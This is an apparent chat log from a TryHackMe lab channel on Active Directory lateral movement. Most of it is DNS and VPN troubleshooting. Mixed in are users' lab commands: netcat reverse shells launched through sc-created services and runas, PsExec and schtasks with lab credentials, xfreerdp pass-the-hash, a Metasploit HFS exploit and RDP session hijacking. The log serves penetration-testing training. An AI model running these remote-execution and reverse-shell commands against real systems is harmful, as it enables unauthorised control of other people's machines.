Guys, I cannot access the distributor.za.tryhackme.com machine. I have set the DNS settings from my NetworkManager and restarted the service. I think there's some issue with the DNS server on the DC? I can't ping the DC using its hostname, pinging on the IP works fine though.

did you set it under ect or ect/systemd

Yeah, did everything as mentioned. Doesn't seem to work for me.

Are you using the attackbox or your own machine?

Using my own machine.

Changed my networkmanager settings to use the thmdc IP as DNS.

Dont forget to check out /etc/resolv.conf

Adjusting that config file helped my dns issue

More than likely its set to nameserver <your VM subnet GW>

Can someone vote a reset for the 10.200.71.101 network, please 🙂

once again 👀

thnx 🙏

Gents, last task for the room, port 7777 is already in use on the AttackBox, you need to change it to a free port

And ladies of course

and everyone else playing the room

Oh man, your role colour is throwing me off 😂

Where is your level!? 😂

I think it is GOD mode…

how to connect to this room running this nslookup thmdc.za.tryhackme.com 10.50.49.139 says ;; communications error to 10.50.49.139#53: connection refused

└─# cat /etc/resolv.conf

Generated by NetworkManager

nameserver 10.50.49.139
search 10.50.49.139
search 8.8.8.8

you have to use the DC IP(something like 10.200.x.101 at the top of the tree diagram) rather than your own thm ip

like this

└─# cat /etc/resolv.conf

Generated by NetworkManager

nameserver 10.200.51.101
nameserver 10.50.49.139
search 10.50.49.139
search 8.8.8.8

remove that nameserver line of your own ip :)

thanks its working now ^^

Is someone else having trouble with the DNS resolution on the attack box?

can you cat /etc/resolv.conf

Sure, thank you for the reply

Gave +1 Rep to @feral granite

Sometimes I can connect but then I get broken pipe

I think I figured it out, maybe you can only have one VPN connection open to the network?

Since I turned off the connection from my local machine it seems to be working fine

Yes, and the VPN config pack is exclusive to that room.

To connect to a machine via winrm, do we need to add the user a local administrator group in the target PC or it will work even if it added on different local group?

why does it constantly disconnect

like not 3 minutes later

Currently trying out other ways listed in task 4 and cannot seem to get scheduled tasks to connect back remotely I am doing the following

schtasks /s 10.200.51.201 /run /TN "legitTask" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever  ```

By default, any user of the "Remote Management Users" will be able to WinRM into a machine. Administrators are also allowed to do so.

Could you try with the following command

.

The part of the command you are trying to run shouldn't include the "<>" characters. /tr "C:\tools\nc64.exe...."

thank you mudra I really appreciate that, was banging my head against the wall yesterday

Gave +1 Rep to @shadow linden

I managed to fix my connection issues just ended up getting stuck trying the other methods

That is required for RDP i guess

RDP has its own group, unless I'm misunderstanding you

Remote Desktop Users

Yeah I misunderstood it then

Although I can see there is a different group which is used for WinRM access.

"The WinRMRemoteWMIUsers_ group allows running Windows PowerShell commands remotely whereas the Remote Management Users group is generally used to allow users to manage servers by using the Server Manager console."
https://social.technet.microsoft.com/Forums/lync/en-US/de8c6dba-955f-4e1a-ae7a-7d85dde3e5b3/winrmremotewmiusers-vs-remote-management-users?forum=winservermanager

There's a couple of ways to go about it, I think. There's some more info about how access to WinRM works on the Windows Local Persistence Room (task 2) in case you are interested: https://tryhackme.com/room/windowslocalpersistence

I am the only who have problems with setting DNS on AttackBox?

Even after using "systemctl restart systemd-resolved"

I even terminated AttachBox machine and started it again...

try the pinned message solution

it should work in case the attackbox is being funny

;; connection timed out; no servers could be reached

After trying nslookup thmdc.za.tryhackme.com

Should I wait for some time?

What's your assigned THMDC IP address?

10.200.75.101

That network seems to be down

can you make sure it is started, and if so send a reset for it

😅

yes, I sent

But I need 4 more votes

It started:
Network state: Running

So, what should I do?

now the IPs are up

the servers should take around 4 mins to start

and then all should be working fine 🙂

Yes, I saw it now after refreshing web page. I started it now. Should I let you know if all is OK? Btw, thanks!

You shouldn't have any further issues, hopefully, but feel free to write if you do

Okay, big up!

Why does this service does not run in the backround

sc \\thmiis.za.tryhackme.com create shell binPath="C:\Temp\nc64.exe 10.200.51.249 -e C:\Windows\System32\cmd.exe 4242" start=auto
sc \\thmiis.za.tryhackme.com start shell
... Cmd is now blocked ...

AFAIK, services are supposed to run in the background context

Pretty sure nc64.exe is not a service binary. Remember for services it actually waits for a flag from the binary to tell it that everything is okay. If that flag is not received, it will terminate the service. Since nc is not a service binary and no flag, service will fail. Why that kills your terminal is a mystery to me

What do you mean? Are you getting a visible shell?

because in the task room it says we need to create a service binary otherwise it will exit after execution right?

Nope, the service is running non interactively but was blocking the cmd

anyways I got the answer, also I am not fully going through the description, rather exploring it on my own

Can someone submit reset request? I can connect to the SSH but same credentials are not working for RDP

What is problem with networks on THM? Precisely, Pivoting and Lateral Movement AD. Network is constantly UP and DOWN. I need to reset 10 times in 10 minutes

And in the end, it ends with network being down again..

Doing anything is useless, because it is falling down every 20-30secs after restarting it.

Hello, does anyone know if it's possible to do the other methods explained on task 3? I've tried using psexec and it doesn't seem to work.

yeah its possible to use psexec

ok thank you I will try to find out whats wrong 🙂

Gave +1 Rep to @untold canopy

if you struggle too much try showing the command you are using

Hey there, I'm sorry you are experiencing these issues. If the network problems persist, feel free to DM me so I can check what might be happening.

I used c:\tools\PsExec64.exe -u za.tryhackme.com\t1_leonard.summers -p EZpass4ever \\thmiis.za.tryhackme.com -i cmd.exe

Keep getting this error... Is this okay?

Not necessarily an error I guess, it's just that this should be resolving to the THMDC ip

I already setup the DNS config and restarted NetworkManager

Exact same setup (except different DC IP) worked in previous AD rooms (enumerating and breaching AD)

Can you cat /etc/resolv.conf

?

@feral granite

Weird right?

Just saw this message, oh well 🤷‍♂️

In your case, nslookup is trying to resolve using 1.1.1.1

it may work for you if you just erase the rest of entries there

Yes, but 1.1.1.1 is for internet access. Also, it into falls back on 1.1.1.1 after it's determined that the DC doesn't offer recursion.

That makes sense

Like I noted earlier, in the previous 2 rooms, nslookup worked as expected. Possibly this room's DC is configured slightly different?

Yes it is

Ahh

may I know on what should I do to get the flag on task 3?

I'm getting this message after I execute flag.exe

Sorry! You are still missing something. No flag for you yet. (1)

This means you are probably using the wrong user to access the flag

are you connecting as t1_leonard.summers to THMIIS?

yes

Just to make sure, could you send me a screenshot of the last commands you ran?

You can DM it to me

What's Going on?

But Other AD Network like enumerating AD and breaching AD can Connect Successfully

Can you try regenerating your connection file?

Yes I tried

But still this ip

🥲

Openvpn endpoint

Can you DM me to check this?

Ok

Having an issue with the connection now

According to the access page I'm connected to the vpn, but now I cannot connect to any of the hosts, as can be see in the screenshot of the kali vm

Everything was working just fine about 30 minutes ago and while I was typing out the runas command in Task3, I got a broken pipe

you can see that it doesn't use the correct DNS to lookup, can you try and remove the 2 other nameservers?

tried already

or just restart your dns

that too

tried turning it off and on again?

and how does your network look like, is it running? (shows on the page)

Yes

And yes

hmmm

also regenerated my vpn configuration

no change

It seems to still try to resolve the DNS name at 1.1.1.1 and not the actual DC. What happens if you do nslookup thmdc.za.tryhackme.com 10.200.51.101?

Can't test it now, but on a related note, I couldn't access any of the other machines on the network (cred distributor, thmjmp...)

Yeah if DNS doesn't work, nothing will work. But that command will tell me if it is your DNS configuration or the network having an issue

@shadow linden im walking through the machine again and the premission for Leonard seem to be broken

excuting :

If I remember correctly, to get there you have to do a runas

yeah that one

for the shell to then use services

chances are you mistyped the password

runas won't do any checks to see if the password is correct because of the /netonly flag

so if your password is wrong, you should get access denied afterwards

in any subsequent command that actually tries to use the credentials

i was using a lower case z in the password you got me

That happens to me a lot as well 🥲

i fat finger most things

hello, noob question. may I know what is wrong am I doing with task 7? I'm getting this error with metasploit.

msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[-] Handler failed to bind to 127.0.0.1:7777:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (127.0.0.1:7777).
[*] Exploit completed, but no session was created.

that means port 7777 is already being used by some other service in your machine

so just change the port number you are using and that should work

you can check who is using the port currently with ss -lpunt

you need to be root to see the name of the process attached to each port though

thanks @shadow linden ! It worked. Finished the network/room 😃

Gave +1 Rep to @shadow linden

Congrats!

thanks!

Now it's working fine. must've been a hiccup somewhere hahah thanks for trying to help 🙂

Gave +1 Rep to @rose kernel

Having some trouble with the Tunneling Complex Exploits section. When I try to create the tunnels, I get an error saying that my machine (attacker machine) port 22 is refusing connections. I'm not sure what to do to fix this. I started a listener on port 22 on my machine (attacker), which seems to allow the tunnel to work, but whne I run the exploit in metasploit, I get a message saying that the exploit has run but no session was created. Anybody able to lend a hand?

omg didn't even pay attention, the ssh service is disabled by default on my vm

Good day,

I am new to THM, most of my time has been spent on HTB. This is my first experience using DNS in an online platform like this and this lab has been a horrible experience as DNS keeps failing.

I have tried both the online attack box and my local kali instance and both with the same result. I have had the best luck with the online attack box though. I have been trying to complete task 3 for 2 days now. DNS will work and then half way through the lab it fails to resolve FQDN. I have restarted "systemd-resolved" many times and did a dig on the domain "za.tryhackme.com" with negative results.

In a attempt I was pretty sure wouldn't work, I placed the respective IP/FQDM in /etc/hosts, but as expected it didn't work.

These labs would be quite good, but DNS is more than raining on this parade.

It would make the lab experience better if you could reboot/revert machines without 5 votes. That way the issue would be temporarily fixed till DNS failed again. But at least the user could solve the issue rather quickly.

Also, I had tried the labs on another computer to make sure it wasn't my PC causing the issue.

Any thoughts @shadow linden?

I've been having this issue too, especially today. It's been temperamental before but today it just isn't connecting to the DNS. Restarted the network and still having the same issue on a few devices

Thanks for your feedback.

Gave +1 Rep to @glass bronze

Possibly needs checking by @shadow linden if they're free, doing the same as I've done on the first two rooms for this network but no result 😦

By golly it is working....but for how long lol

Now I am getting "broken pipe" errors on THMJMP2 port 22. 😦.

Whilst you're executing commands on SSH?

Ya. Can't type more than a word and then the pipe breaks

I think I will put a nail in this coffin for today, or at least till we hear back from the THM staff. Wasted WAY too much time on this, very disappointing.

Hope you have a good day!

You too 🙂

Hey @lilac hedge, I'm sorry you were having this issues. As far as any reports we've had, the main problem is mostly the attackbox client-side configuration not sticking for some reason. If you are using the attackbox, there is a pinned solution that should work a bit better for you. If using your own machine, I'm more than happy to provide any support if needed, but that will depend on the specific OS you might be using. The DNS server has been working fine (as far as I've seen), but if you feel it might be responsible for the issues you are facing, please send me some additional info so I can try to pinpoint the problem.

Regarding the SSH broken pipes, maybe you are using THM's VPN on top of some other VPN like ExpressVPN or the like? This sounds like an MTU problem that may arise if doing so.

Good day @shadow linden,

Thanks for your response. I really enjoy your lab content and once I get the lab DNS under control the experience will be complete. Thanks for putting the content together for us.

I will test today, but yesterday when using the THM Attack Box if I ran the cmd "systemctl restart systemd-resolved" x 2 (twice) DNS would work again. If it stopped working at some point I used the same technique to be able to resolve FQDNs again. Hopefully this will be a workaround for me and maybe for others. I will also check out the pinned solution you mentioned.

In respect to the broken pipes, I am not employing another VPN on top of the THM VPN. After taking a break from the labs for a bit the issue went away and hasn't returned so far. 🤷

Have a great day. Cheers.

Gave +1 Rep to @shadow linden

Let me know if any issues persist. Feel free to DM me about it and I'll do my best to reply fast so we can check together 🙂

This should be a solid way to configure the DNS on the attackbox. Let me know if this improves anything.

Much appreciated 🙂

Yes! Works like a charm. Thanks @shadow linden

Gave +1 Rep to @shadow linden

Hi guys, im facing a problem where i am able to upload a reverse shell .php to a dolibarr cms. When trying to executing the file, it is downloaded instead of executing. Help needed on this

TBH worst rooms THM crated is AD all of them have vpn issue connection

Any one working right now fi lateral-movement room?

Is it working at all?

I can not even ping THMDC

Hey there, glad to help you with that. Can you DM me so we can check what might be happening?

I sent you a friend request

Hello guys could you do me a favor to reset the room we need two more vote

Hi ! When trying to use .msi files on the IIS, I'm getting this error :

Do i have to reset the network ?

you need to replace TARGET with the machine you want to move to

Damn

Was just tired

Thank

And yes it’s way better now 😂😅

@shadow linden hi, maybe you can update this part and include a link.

thank you @shadow linden

Gave +1 Rep to @shadow linden

Link added for you. 🙂

cool. i didn’t ask specifically for myself, for future students. thanks

Gave +1 Rep to @latent owl

Hello ! I'm a bit stuck at Kerberos but I have literally no idea why... Does anyone know what's wrong in what I'm trying to do ?

||I've tried with the last digit and without, but I don't think the thing is there||

@shadow linden hello , I have set my DNS server to DC in /etc/resolved.conf and also started the services , but when i do nslookup on DC it's showing error like this : ;; Got recursion not available from 10.200.64.101, trying next server

Having a hellofa time with DNS in task 1. I'm using my own Kali attack VM. I'm green checks on the connection tab to the Lateralmovementandpivot VPN server and the DNS in NetworkManager was appropriately set to 10.200.75.101. I can ping this IP address but when I nslookup thmdc.za.tryhackme.com, I get:

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

The Server it's using is 192.168.57.2, which is not the DNS specified in NetworkManager. When I look at all the interfaces that are up, that one matches my eth0 IP instead of lateralmovement. Anyone with any ideas or additional troubleshooting steps?

I moved on to using the built-in Ubuntu attack machine and DNS seems to be fine in here. I'll continue this way.

Run the CMD and then use the flag

I am not able to get the reverse shell as t1_toby.beck user. This is the PTH command

Also the following command giving me the account restriction error

xfreerdp /v:thmjmp2.za.tryhackme.com /d:za /u:t1_toby.beck /pth:533f1bd576caa912bdb9da284bbc60fe

Can someone allow this user to login via RDP? Need to take few screenshots as PoC 😅

The login is negotiated while netonly process, therefore get the reverse shell and use winrs

I am not to hijack the session of the t1_toby.beck user. Any think I am missing

Hey there, this is expected and won't bother you on doing the room. Even if nslookup complains about it, you should be able to do the rest of the room without a problem

Are you running your cmd.exe as SYSTEM? If you aren't SYSTEM, tscon will ask you for the user's password

As an administrator user

tier 2 admin

that won't be enough

you need to psexec into SYSTEM before attempting RDP hijacking

Ah so psexec for system. got it

Wondering if we can use runas for system user or psexec is required

I don't think you are allowed to runas as SYSTEM, but I might be wrong

I'd guess runas will probably throw an error on it, or just ask you for a password.

hmm cant connect to the network on my VM, file regenerated no IP displayed for the VPN but ip a show that i'm on the network resloved.conf is good, why is it not working? (working good with attackbox)

thx

if you refresh the page does the network show as started? and can you show a screenshot of ip a

Wait, are you using kali and the attackbox at the same time? If so, the attackbox auto-connects with the same vpn config, which will cause connection issues as they disconnect each other

i have tested first with my VM

let me kill the attackbox

and with this first test nothing then tested on the attackbox and then working

i have still nothing

can you kill the openvpn process, check there aren't any others running when you ip a then restart it. Then try to ping the domain controller?

on it

also, what subnet are you in?

Subnet 64 is working

thmdc 10.200.64.101

can you ping it?

yep

but no resloved

resolved sorry

are you following the kali or the attackbox method for setting dns?

kali for the VM and the other for attackbox

the edit connection method not directly edit resolved.conf

you might need to just run sudo systemctl restart NetworkManager twice? sometimes that does it for me

done it

but will do it again;)

If that doesn't work, Kali might be prioritizing your local DNS over the one in the network

(was not the case for the two other networks btw)

(if it's the case)

in that case, you'd have to manually edit resolv.conf and delete any DNS that isn't THMDC

or at least set the THM one as the first one

will try at first sec

if you send us a capture of nslookup thmdc.za.tryhackme.com we can be sure of what DNS is being taken into account

THM is in first position

(no issue, well not as much issues for the other networks;))

chances are you are set up already. Can you try opening http://distributor.za.tryhackme.com/creds on your browser?

nslookup isn't playing nicely with that network, but the rest should probably work

Try runnning the nslookup command in root.

wtf ^^ @shadow linden I can connect ^^

Yeah... nslookup is just ignoring the DNS, but other programs should work OK with it

@feral granite

you can do the room that way

at long last 🙂

just don't mind nslookup

I hope it can help some others;) getting back to work now

thx @shadow linden

Gave +1 Rep to @shadow linden

thx @lilac kite and @feral granite

When I did the final room, nslookup would only work for me in root 😂

well if we are unable to manage this kind of situation, let's change of hobby 🙂 THX ALL !

well, that's an interesting one...

^^

Apparently this is a known thing with the way nslookup deals with the very specific setup where you have more than a DNS server configured, and the first one doesn't have recursion enabled https://github.com/coredns/coredns/issues/3835

thx !

Hey @shadow linden are there any labs for mssql abusing on thm?

I recommend using the search feature on the site 😉

Yes but unfortunately it lacks basic features + I have now setup on my infra. Thanks for your help

Gave +1 Rep to @lilac kite

Can I get some help with the HOLO network. I am at task 36. For some reason mimikat wont run properly. I do have what I did documented. Any help
would be great. I wanted to create a shell but have some questions about the chisel set up on my client

Try at #holo-network

I'm using the attackbox but can't reach http://distributor.za.tryhackme.com/creds. Also had to add the dns resolved.conf. I do see see lateralmovemen under network interfaces

and can't ping the thmdc.tryhackme.com either

Is it .loc in this one?

Nope, wrong one, ignore that.

If you can't ping the IP, it's possible the network isn't running. Refresh the page and click the start button. Also what subnet are you in?

I Can Ping 10.200.51.101 (dc) i can’t Ping by name . Tried removing the dns and spawning new attack box. But can’t ping by name thmdc*****

And you've done the systemctl restart thingy command? Sometimes that needs to be run twice to get things going 🤷‍♂️ failing that you could edit /etc/resolv.conf directly and it should work, but know that the attackbox will revert your changes after some point, so you'll have to remake them.

It might also be a good idea to run ip a and if you have multiple 10.50 addresses, leave the previous AD networks you've likely recently completed (leaving them doesn't reset progress), and then when you restart your attackbox it'll only be connecting to one VPN profile (it auto connects to your openvpn network profiles)

will give it a go ... i will get back to you later have to go .. Thank you so much for the help @lilac kite

Gave +1 Rep to @lilac kite

I might not be around later today, but someone will be

i am have same problem as to other people

I cannot resolve

Can you try navigating to http://distributor.za.tryhackme.com/creds ?

if it works, then you can just ignore nslookup and continue with the rest of the rom

strange?

nslookup is being weird. It seems to be an expected behaviour for this specific setup

the room should work though 🙂

Just don't mind nslookup. Other thools shouldn't behave that way

there is a problem as I can not connect VPN

is there a support person to look into this issue

I can look into it, but it would seem you are already connected from the previous images

not anymore

I got disconnected and cant connect again

i am just rebooting my kali to take that out of the equation

alright. If that doesn't work, just send a screenshot of the error you are getting and I'll check

by any chance, are you also running the attackbox on the website?

let me check

no attack box is not running

can you DM me to continue checking on this?

!vpnscript

guess you have already tried this???

if not it is worth a shot

Might be worth @rose kernel and yourself adding a note to say something like "Note: occasionally nslookup will fail, but you can still resolve the links in question, in this case, you can continue with the room."

Or add dig as an alternative to nslookup?

I'll update the room in a bit 🙂

Anyone else having issues getting the reverse shell in task 3 via the runas command? It looks like it's executing on the THMJMP2 terminal but I don't receive anything on my NC listener

Are you getting any errors?

runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443"                                                          

Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:                                         

Attempting to start c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers" ... 

Not seeing any errors 😦

🧐

lol ❤️

if you manually run c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443, does it work?

one sec ... i'll try it

it does not, it hangs for a bit, completes, and then nothing on the listener still

maybe someone else replaced the nc64.exe executable?

can you try nc64.exe -h?

it should at least show the help

yes it does

can you ping your DC from the attackbox?

maybe it disconnected

all you are doing should work

I can ping the IP, and FQDN of the DC

I'm going to take a break to grab some lunch, and restart my attack box etc and start from the beginning, if I run into the same issue i'll ping you again

alright!

thanks @shadow linden ... i really like the way the room is laid out though!

Gave +1 Rep to @shadow linden

I just realized what is happening. When executing nc.exe, you are using the attackbox's eth0 IP address. You have to use the IP address on the lateralmovement interface, which you can get with ip add show lateralmovement.

The vulnerable network can't reach your eth0 on the attackbox, so you get nothing.

This makes sense, thanks i'm going to give it another try now

It's totally in the instructions on task 1 ... that i totally didn't skip over ... lol

Glad it works now!

again appreciate your help, thanks @shadow linden

Gave +1 Rep to @shadow linden

got through the whole room, just getting hung up on the last thing with rejetto, and i'm probably because i'm making a mistake

Ah. I just finished this lab today; if you follow the steps for forwarding verbatim, you should find success

Yeah i just realized my mistake, in metasploit i was setting the srvhost instead of the srvport

Nice 🙂 it happens 🤷‍♂️

Yup got it. woo

Huzzah! 👏

You mean with the user you are getting from the distributor?

could you send a screenshot of the command and the error?

Did you try changing the tunneluser's password?

yes, the command will hang there until you close it

is there some trick to getting the network back up successfully? was working moments ago and it shut off. I hit start, and it's now 10 minutes and still nothing seems up.

I will try the attackbox.

Try refreshing your browser. Sometimes the website gets stuck showing the network as started when in reality it has been stopped.

Oh, that says it's up. I just don't have connectivity to any services.

next time it's up I'll see if pings work, just because that's quicker testing. 😄

hello i have an issue with Lateral Movement and Pivoting room i can't connect to the dc http://distributor.za.tryhackme.com/creds. help plz

Have you sorted the recolve.conf?

yp

I have the same issue that 3RB

Hello mate, please I need help with lateral movement task 7 Tunneling complex exploits, the putting whole command together part is confusing and I’m having hard time getting over it I’m I suppose to ssh using the username I login with by replacing tunneluser@attacker_Ip , if no I keep getting prompt to input a password after the initial command what I’m I doing wrong need some help thanks

now i have this error MOZILLA_PKIX_ERROR_SELF_SIGNED_CERT

same as other network ad room, the network in unstable, it is impossible to do the room

using the attackbox :

root@ip-10-10-157-29:~# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

Non-authoritative answer:
Name:    thmdc.za.tryhackme.com
Address: 10.200.51.101

root@ip-10-10-157-29:~# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

sometimes resolv works, 15sec after it doesnt work

Hi!
Hmm, someone else has encountered.
Task 4 Moving Laterally Using WMI
I did everything as in the task point by point.
Got a shell.
But the exe file with the flag refuses to run.

Sorry! You are still missing something. No flag for you yet. (7)
It was done this way on purpose))
==========
It's all good.
A strange glitch.
At the end of the day, I did all the same operations again and the flag was displayed without an error.

Hi All, do you able to get cred from http://distributor.za.tryhackme.com/creds ii update the resolve.conf, and get nslookup for the domain access.

And are you getting the creds?

no, it get the site ot found:

Can you ping distributor.za.tryhackme.com?

And could you run ip a ?

@lilac kite , finally, i got the same trouble as the enumerating-ad network room.
i exit other network room and i got the same trouble.

# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

Around every ~1 or 2min, nslookup failed.
i had to systemctl restart, then 2min later, it fails again.

# systemctl restart systemd-resolved
# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

Non-authoritative answer:
Name:    thmdc.za.tryhackme.com
Address: 10.200.64.101

# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 02:5e:46:43:4d:c7 brd ff:ff:ff:ff:ff:ff
    inet 10.10.12.158/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::5e:46ff:fe43:4dc7/64 scope link 
       valid_lft forever preferred_lft forever
3: lateralmovement: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none 
    inet 10.50.61.129/24 brd 10.50.61.255 scope global lateralmovement
       valid_lft forever preferred_lft forever
    inet6 fe80::420e:995c:8b00:ade5/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
4: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:5b:0b:b7:40 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:5bff:fe0b:b740/64 scope link 
       valid_lft forever preferred_lft forever
6: veth943a3aa@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether e6:65:6d:60:9e:99 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::e465:6dff:fe60:9e99/64 scope link 
       valid_lft forever preferred_lft forever
8: veth3251118@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 4a:97:f5:05:d1:dc brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::4897:f5ff:fe05:d1dc/64 scope link 
       valid_lft forever preferred_lft forever

can the user_flags be deleted??i think someone has deleted for the flag of Leonard.summers

it says the flag will be found under Leonard's Desktop after running flag.exe but didn't find the flag.exe ```
Directory of C:\Users\t1_leonard.summers\Desktop

06/15/2017 06:29 PM <DIR> .
06/15/2017 06:29 PM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
2 File(s) 1,081 bytes
2 Dir(s) 8,380,841,984 bytes free

are you sure flag.exe isn't somewhere else? it reads to me like you run flag.exe, which will then generate a flag.txt in the directory you're in. @tiny bramble

Anyone run into issues when receiving the shell at the end of task 3 from THMIIS? I get the connection when starting the services of the uploaded exe. But if I try to type anything like "hostname or whoami" the shell closes.

It looks like it may be because the msfvenom .exe running on the port 4444 we started won't stay running after starting it. sc query shows it in the stopped state if you check right after.

well nvm, its staying open now.. I see bidirectional traffic in wireshark between my vpn ip and thmiis.... but the shell gets no returns it's just blank, I guess I'll try stabilizing it

sigh @dry summit ⬆️

Cheers!

Is that from the Attackbox or your own machine? and did you sort it?

@lilac kite , All commands from attacker box, whole result, no sort

Hmm, not sure at the moment, I'll check it out later

haha no need to sigh just yet. attempts to stabilize had no change... 😦

oh that was not targeted at you.... it was for another user posting some rule breaking stuff and getting it removed

oh sorry ha

no problem

no worries tho

root@ip-10-10-47-173:~# systemctl restart systemd-resolved
root@ip-10-10-47-173:~# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

Unable to resolve name with THMDC

Able to ping 10.200.64.101 though

Running from AttackBox

Hi guys I cannot connect to lateral movement network. I used attackbox kali vm and my own machine and none of them did not connect to network

have you tried leaving and rejoining the room then regenerating your vpn file for said network.... wait 5 mins then download it again

Regenerate vpn
add dns DNS=<THMDC 10.200.51.101>
restart services
still there is no connection

And its about 5 minutes network trying to reset but it looks like it's stucked

oh okay then that is not the cause of your problem

thought it might have been the standard vpn issue

but that seems like another problem

@bronze flame hello admin is there any problem in lateral movement lab? Network status stuck at resetting

doubt hydra can help but jabba might be able to as they are thm staff

what is jabba username? I coulnd't find it

@azure bronze

Hi that’s me

Hey could yo please help me with this problem?

by the way thanks for response

Gave +1 Rep to @azure bronze

Drop me a DM:)

Hey there, there is a known issue with nslookup in the lab. Can you try just navigating to http://distributor.za.tryhackme.com/creds ? If the site works, then you are connected and good to go with the rest of the room.

if the website doesn't work, check the pinned message in this channel for a solution on getting your DNS configured properly

it's for the lateral movement and pivoting and the rdp connection cert keeps on ignoring ```
┌──(root㉿kali)-[~]
└─# xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_jessica.richards /p:o6R9PfosU /cert-tofu
[13:56:00:101] [11899:11900] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0

ping is working ┌──(root㉿kali)-[~] └─# ping thmdc.za.tryhackme.com PING thmdc.za.tryhackme.com (10.200.64.101) 56(84) bytes of data. 64 bytes from 10.200.64.101 (10.200.64.101): icmp_seq=1 ttl=127 time=418 ms 64 bytes from 10.200.64.101 (10.200.64.101): icmp_seq=2 ttl=127 time=630 msbut the creds site is not responding ```
Hmm. We’re having trouble finding that site.

We can’t connect to the server at distributor.za.tryhackme.com.

If that address is correct, here are three other things you can try:

Try again later.
Check your network connection.

the DNS has been configured correctly like i did for the other rooms about AD too but this one ain't working now, before it does

if the ping works, the DNS is working

let me just check if the server is working

ok thanks

Gave +1 Rep to @shadow linden

the server is up and running

all I can think of are issues with your browser cache not updating

if you do curl -v http://distributor.za.tryhackme.com/creds what do you get?

┌──(root㉿kali)-[~]
└─# curl http://distributor.za.tryhackme.com/creds
curl: (6) Could not resolve host: distributor.za.tryhackme.com

ah then your DNS isn't working anymore

try this

can you DM me so we can check

ok

I'm on day 3 of a vpn connection loop for lateral. Not sure what to try to fix. I have left the room, regenerated and redownloaded the config, waited for a network reset. Anything else I should try?

hey there, can you DM me to check

Big shout out to @shadow linden for this room. Really well done and easy to follow. Great explanation on the Port Forwarding section. The Tunnelling Complex Exploits section was really cool and well explained.

hey folks, I've been struggling with this room for 2 evenings in a row now, I can't seem to connect to the DC.

I use the command mentioned in the intro systemd-resolve --interface lateralmovement --set-dns 10.200.51.101 --set-domain za.tryhackme.com . After that, the creds page is timing out, nslookup thmdc.za.tryhackme.com is timing out too etc. I'm using the THM Attack Box. Suggestions greatly appreciated.

Hey there, make sure the room's network is started from the website. Refresh the page to check the current status just in case.

Hey @shadow linden , thanks for the suggestion, it's currently listed as running; uptime 23m.

Gave +1 Rep to @shadow linden

that's weird... Let me check if the network is working as expected then

the network is down from my end

if you refresh the website and it still appears as started, then you may need to reset the network

that's very weird, it's definitely showing up as active and running in my browser, I've also just extended the time. I've also clicked the reset button, it's currently sitting at 3/5 votes for what it's worth.

A reset should do. You can also vote again for a reset after an hour, which should help speeding up the process

Lol it's cool how yall know all these stuff😯

gotcha, thanks, I'll try that, though I will say I had the exact same issue yesterday evening with the DC with the exact same IP so my gut tells me it might be just that DC or so. But I'll do as advised, thanks.

Gave +1 Rep to @shadow linden

I'll send a word to support about this just in case. If the reset doesn't solve it let me know and I'll have them take a look 🙂

hey @shadow linden I can confirm the issue is resolved after a network reset, thanks again. 👍

Gave +1 Rep to @shadow linden

That's great! 🥳

Anybody got a hint for what is needed to run the flag.exe? keeps saying you're missing something no flag for you. 😦 lol

Who is active in network?

creds website doesnt open . nslookup returns ip of dc but I couldn't get creds

Hey there, what network are you in? (10.200.x.0)

I'm stuck at beginning

can you try doing nslookup distributor.za.tryhackme.com?

that isn't right...

what seems to be problem?

the IP you are getting is wrong. Someone probably messed with the DNS config

You need to reset that network through the website

I did it

did you get the required 5 votes?

yup. Network was resetted 10 minutes ago

I'll have a check at it then. That's very weird

And also I cant connect to the network over my own kali machine. Vpn stuck always at resetting.

It would be great 🙂

